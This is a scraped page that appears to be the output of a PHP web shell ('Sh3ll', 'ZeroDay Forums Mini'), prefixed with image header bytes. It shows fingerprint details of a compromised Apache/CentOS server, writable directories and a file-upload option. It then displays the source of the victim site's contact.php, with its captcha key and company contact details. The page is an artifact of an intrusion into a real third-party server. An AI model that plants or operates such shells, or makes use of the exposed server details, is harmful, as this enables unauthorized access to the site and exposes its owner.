ÿØÿàJFIFÿÛ„ ( %"1"%)+...383,7(-.- 404 Not Found
Sh3ll
OdayForums


Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.20
System : Linux st2.domain.com 3.10.0-1127.10.1.el7.x86_64 #1 SMP Wed Jun 3 14:28:03 UTC 2020 x86_64
User : apache ( 48)
PHP Version : 7.4.20
Disable Function : NONE
Directory :  /var/www/html/sharefilefree/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/sharefilefree/contact.php
<?php 
	$currPage = "contact";
  include("includes/header.php"); 


?>

<div class='container'>
  <div class="jumbotron">
	  <h1><?php echo lang("hl_contact"); ?></h1>
  </div>

  <div class="row">
  	<div class="col-sm-9">
  		<h3><?php echo lang("hl_contactform"); ?></h3>
  		<div id='cnote'>
			</div>
		<form class="form-horizontal" method="post" action="contact.php" id="contactf">
			<input type="hidden" name="action" value="contact" />
			<!-- <div class='col-xs-12'> -->
				<div class='row'>
					<div class='col-md-6'>
						<div class="form-group">
							<label class="control-label col-sm-4"><?php echo lang("descr_name"); ?></label>
							<div class="col-sm-8">
								<input type="text" name="name" placeholder="<?php echo lang("placeholder_name"); ?>" class="form-control" value="" required='required' /></div>
						</div>
						<div class="form-group">
							<label class="control-label col-sm-4"><?php echo lang("descr_email"); ?></label>
							<div class="col-sm-8">
								<input type="email" name="email" placeholder="<?php echo lang("placeholder_email"); ?>" class="form-control" value="" required="required" />
							</div>
						</div>
						<div class="form-group">
							<label class="control-label col-sm-4"><?php echo lang("descr_tel"); ?></label>
							<div class="col-sm-8">
								<input type="text" name="tel" placeholder="<?php echo lang("placeholder_tel"); ?>" class="form-control" value="" />
							</div>
						</div>
					</div>
					<div class='col-md-6'>
						<div class="form-group">
							<div class="col-xs-12">
								<textarea name="message" placeholder="<?php echo lang("placeholder_message"); ?>" class="form-control" rows="5" required="required"></textarea>
							</div>
						</div>
					</div>
					<div class='clearfix'></div>
					<?php 
					if ($config->captchaContact) {
					?>
                        <script src="https://www.google.com/recaptcha/api.js" async defer></script>
                    <div class="col-md-6 mb-5">
                        <div class="g-recaptcha" data-sitekey="6LdoQ9QcAAAAAABTDUzXRhNNe7zOzedsdW15If0R"></div>
                    </div>
                        <?php
                    }
                    ?>
                    <div class='col-md-6'>
                        <div class="form-group">
                            <div class="col-sm-8 col-md-4 col-sm-offset-4 col-md-offset-2 mt-5">
                                <input type="submit" class="btn btn-primary btn-block" value="<?php echo lang("descr_sendmess"); ?>">
                            </div>
                        </div>
                    </div>




				</div> <!-- row -->
			<!-- </div> col-xs-12 -->


		</form>
  	</div>
  	<div class="col-sm-3">
  		<h4>FreeShareFile Company Ltd.</h4>
			<p>No. 625A, Ha Hoang Ho Street, My Xuyen Ward, Long Xuyen City <br />
                An Giang Province<br />
			Vietnam<br /><br />
			<strong>Email</strong>: <a href='freesharefile.com@gmail.com'>freesharefile.com@gmail.com</a><br />
			<strong>Telefon</strong>: +84 708973379<br /><br />
			<a href='https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3924.5453028723405!2d105.43459491483466!3d10.378193969255504!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x310a72e3cb346573%3A0x4905153cffdf8abe!2zNjI1IEjDoCBIb8OgbmcgSOG7lSwgUGjGsOG7nW5nIE3hu7kgWHV5w6puLCBUaMOgbmggcGjhu5EgTG9uZyBYdXnDqm4sIEFuIEdpYW5nLCBWaWV0bmFt!5e0!3m2!1sen!2s!4v1634372315875!5m2!1sen!2s' onclick="window.open(this.href); return false;"><img src='<?php echo $config->instDir; ?>/img/map.gif' alt='' class='img-rounded img-responsive' /></a>
			</p>
  	</div>
  </div>

</div> <!-- container -->

<?php include("includes/footer.php"); ?>

ZeroDay Forums Mini